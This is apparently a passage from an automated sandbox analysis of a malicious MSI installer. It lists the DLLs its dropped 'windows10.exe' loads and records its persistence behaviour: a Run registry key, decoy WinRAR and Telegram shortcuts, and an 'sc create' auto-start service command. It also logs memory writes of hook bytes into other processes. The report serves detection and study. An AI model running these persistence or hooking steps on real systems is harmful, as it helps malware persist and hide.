            Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: version.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: starburn.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: uxtheme.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: mpr.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: magnification.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: wtsapi32.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: d3d9.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: dwmapi.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: windows.storage.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: wldp.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: wsock32.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: winmm.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: winsta.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: userenv.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: slwga.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: sppc.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: netapi32.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: samcli.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: wkscli.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: srvcli.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: netutils.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: schedcli.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: logoncli.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: sspicli.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: security.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: secur32.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: powrprof.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: umpdc.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: wevtapi.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: olepro32.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: activeds.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: adsldpc.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: dxva2.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: uxtheme.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: riched20.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: usp10.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: msls31.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: dataexchange.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: d3d11.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: dcomp.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: dxgi.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: twinapi.appcore.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: cscapi.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: sxs.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: wbemcomn.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: amsi.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: profapi.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: fwpuclnt.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: idndl.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: iphlpapi.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: napinsp.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: pnrpnsp.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: wshbth.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: nlaapi.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: mswsock.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: dnsapi.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: winrnr.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: rasadhlp.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: version.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: starburn.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: uxtheme.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: textshaping.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: textinputframework.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: coreuicomponents.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: coremessaging.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: ntmarta.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: coremessaging.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: wintypes.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: mpr.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: magnification.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: wtsapi32.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: d3d9.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: dwmapi.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: windows.storage.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: wldp.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: wsock32.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: winmm.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: winsta.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: userenv.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: slwga.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: sppc.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: netapi32.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: samcli.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: wkscli.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: srvcli.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: netutils.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: schedcli.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: logoncli.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: sspicli.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: security.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: secur32.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: powrprof.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: umpdc.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: wevtapi.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: olepro32.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: activeds.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: adsldpc.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: dxva2.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: riched20.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: usp10.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: msls31.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: dataexchange.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: d3d11.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: dcomp.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: dxgi.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: twinapi.appcore.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: sxs.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: wbemcomn.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: amsi.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: profapi.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: fwpuclnt.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: idndl.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: iphlpapi.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: napinsp.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: pnrpnsp.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: wshbth.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: nlaapi.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: mswsock.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: dnsapi.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: winrnr.dll
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Section loaded: rasadhlp.dll
            Source: C:\Windows\Installer\MSI5DCF.tmp Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Window found: window name: TMainForm
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Automated click: OK
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Automated click: Next >
            Source: Window Recorder Window detected: More than 3 window changes detected
            Source: CrzA2u67LQ.msi Static file information: File size 31430144 > 1048576
            Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\viewer.pdbC source: MSI5DCF.tmp, 00000003.00000000.1726216258.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp, MSI5DCF.tmp, 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp, MSI5DEF.tmp, 00000004.00000000.1726938190.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp, MSI5DEF.tmp, 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp, CrzA2u67LQ.msi, MSI5DEF.tmp.1.dr, MSI5DCF.tmp.1.dr
            Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: CrzA2u67LQ.msi, MSI55AB.tmp.1.dr
            Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\viewer.pdb source: MSI5DCF.tmp, 00000003.00000000.1726216258.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp, MSI5DCF.tmp, 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp, MSI5DEF.tmp, 00000004.00000000.1726938190.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp, MSI5DEF.tmp, 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp, CrzA2u67LQ.msi, MSI5DEF.tmp.1.dr, MSI5DCF.tmp.1.dr
            Source: initial sample Static PE information: section where entry point is pointing to: .F~x
            Source: StarBurn.dll.1.dr Static PE information: section name: .didata
            Source: StarBurn.dll.1.dr Static PE information: section name: .Hm8
            Source: StarBurn.dll.1.dr Static PE information: section name: .?#3
            Source: StarBurn.dll.1.dr Static PE information: section name: .F~x
            Source: C:\Windows\Installer\MSI5DCF.tmp Code function: 3_2_00AF81F0 push ecx; ret 3_2_00AF8203
            Source: C:\Windows\Installer\MSI5DEF.tmp Code function: 4_2_00B081F0 push ecx; ret 4_2_00B08203
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Code function: 5_2_00A6C2E8 push esi; ret 5_2_00A6C2E9
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Code function: 5_2_00A72214 push ecx; mov dword ptr [esp], ecx 5_2_00A72219
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Code function: 5_2_00A70FD8 push ecx; mov dword ptr [esp], edx 5_2_00A70FD9
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Code function: 5_2_00A70B44 push ecx; mov dword ptr [esp], edx 5_2_00A70B49
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Code function: 5_2_00AC827C push ecx; mov dword ptr [esp], ecx 5_2_00AC827D
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Code function: 5_2_00AC3396 push cs; ret 5_2_00AC3398
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Code function: 5_2_00AC3734 push ecx; mov dword ptr [esp], edx 5_2_00AC3735
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Code function: 5_2_00BC5930 push ecx; mov dword ptr [esp], eax 5_2_00BC5932
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Code function: 5_2_00BC5B48 push 00BC5BF4h; ret 5_2_00BC5BEC
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Code function: 5_2_00BB0698 push ecx; mov dword ptr [esp], edx 5_2_00BB0699
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Code function: 5_2_00BC7FE4 push ecx; mov dword ptr [esp], edx 5_2_00BC7FE5
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Code function: 16_2_00BE60B0 push ecx; mov dword ptr [esp], ecx 16_2_00BE60B4
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Code function: 16_2_00BF203C push ecx; mov dword ptr [esp], edx 16_2_00BF203D
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Code function: 16_2_00BED020 push ecx; mov dword ptr [esp], edx 16_2_00BED021
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Code function: 16_2_00C3917C push ecx; mov dword ptr [esp], ecx 16_2_00C39181
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Code function: 16_2_00BB7160 push 00BB71F6h; ret 16_2_00BB71EE
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Code function: 16_2_00BE629C push ecx; mov dword ptr [esp], ecx 16_2_00BE62A0
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Code function: 16_2_00BF02E8 push ecx; mov dword ptr [esp], edx 16_2_00BF02E9
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Code function: 16_2_00C41210 push 00C41254h; ret 16_2_00C4124C
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Code function: 16_2_00C193E8 push 00C194E8h; ret 16_2_00C194E0
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Code function: 16_2_00BEE32C push ecx; mov dword ptr [esp], edx 16_2_00BEE32D
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Code function: 16_2_00BF15F0 push ecx; mov dword ptr [esp], edx 16_2_00BF15F1
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Code function: 16_2_00BEC5D0 push ecx; mov dword ptr [esp], edx 16_2_00BEC5D1
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Code function: 16_2_00BEA540 push ecx; mov dword ptr [esp], edx 16_2_00BEA541
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Code function: 16_2_00BF3698 push ecx; mov dword ptr [esp], edx 16_2_00BF3699
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Code function: 16_2_00BAC690 push 00BAC6C8h; ret 16_2_00BAC6C0
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Code function: 16_2_00B60698 push ecx; mov dword ptr [esp], edx 16_2_00B60699
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Code function: 16_2_00BEF898 push ecx; mov dword ptr [esp], edx 16_2_00BEF899
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Code function: 16_2_00BE9890 push ecx; mov dword ptr [esp], edx 16_2_00BE9891

            Persistence and Installation Behavior

            Source: C:\Windows\System32\msiexec.exe Executable created and started: C:\Windows\Installer\MSI5DEF.tmp
            Source: C:\Windows\System32\msiexec.exe Executable created and started: C:\Windows\Installer\MSI5DCF.tmp
            Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\Pictures\fotosdaviagem\StarBurn.dll
            Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\Pictures\fotosdaviagem\windows10.exe
            Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI5DCF.tmp
            Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI5783.tmp
            Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI55AB.tmp
            Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI5723.tmp
            Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI5762.tmp
            Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI5DEF.tmp
            Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI5820.tmp
            Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR
            Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Telegram Desktop
            Source: C:\Windows\System32\msiexec.exe Registry value created or modified: HKEY_CURRENT_USER\Microsoft\Windows\CurrentVersion\Run windows
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\sc.exe sc create MeuServico binPath= "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" start= auto

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Memory written: PID: 6388 base: 6E0005 value: E9 8B 2F 82 76
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Memory written: PID: 6388 base: 76F02F90 value: E9 7A D0 7D 89
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Memory written: PID: 6388 base: 740005 value: E9 2B BA 78 76
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Memory written: PID: 6388 base: 76ECBA30 value: E9 DA 45 87 89
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Memory written: PID: 6388 base: 760008 value: E9 8B 8E 7B 76
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Memory written: PID: 6388 base: 76F18E90 value: E9 80 71 84 89
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Memory written: PID: 6388 base: 780005 value: E9 8B 4D 47 75
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Memory written: PID: 6388 base: 75BF4D90 value: E9 7A B2 B8 8A
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Memory written: PID: 6388 base: 7A0005 value: E9 EB EB 46 75
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Memory written: PID: 6388 base: 75C0EBF0 value: E9 1A 14 B9 8A
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Memory written: PID: 6388 base: 7B0005 value: E9 8B 8A 82 74
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Memory written: PID: 6388 base: 74FD8A90 value: E9 7A 75 7D 8B
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Memory written: PID: 6388 base: 3A40005 value: E9 2B 02 5C 71
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Memory written: PID: 6388 base: 75000230 value: E9 DA FD A3 8E
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Memory written: PID: 7376 base: 2420005 value: E9 8B 2F AE 74
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Memory written: PID: 7376 base: 76F02F90 value: E9 7A D0 51 8B
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Memory written: PID: 7376 base: 2480005 value: E9 2B BA A4 74
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Memory written: PID: 7376 base: 76ECBA30 value: E9 DA 45 5B 8B
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Memory written: PID: 7376 base: 2490008 value: E9 8B 8E A8 74
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Memory written: PID: 7376 base: 76F18E90 value: E9 80 71 57 8B
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Memory written: PID: 7376 base: 25C0005 value: E9 8B 4D 63 73
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Memory written: PID: 7376 base: 75BF4D90 value: E9 7A B2 9C 8C
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Memory written: PID: 7376 base: 25D0005 value: E9 EB EB 63 73
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Memory written: PID: 7376 base: 75C0EBF0 value: E9 1A 14 9C 8C
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Memory written: PID: 7376 base: 25E0005 value: E9 8B 8A 9F 72
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Memory written: PID: 7376 base: 74FD8A90 value: E9 7A 75 60 8D
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Memory written: PID: 7376 base: 25F0005 value: E9 2B 02 A1 72
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Memory written: PID: 7376 base: 75000230 value: E9 DA FD 5E 8D
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Memory written: PID: 7216 base: 600005 value: E9 8B 2F 90 76
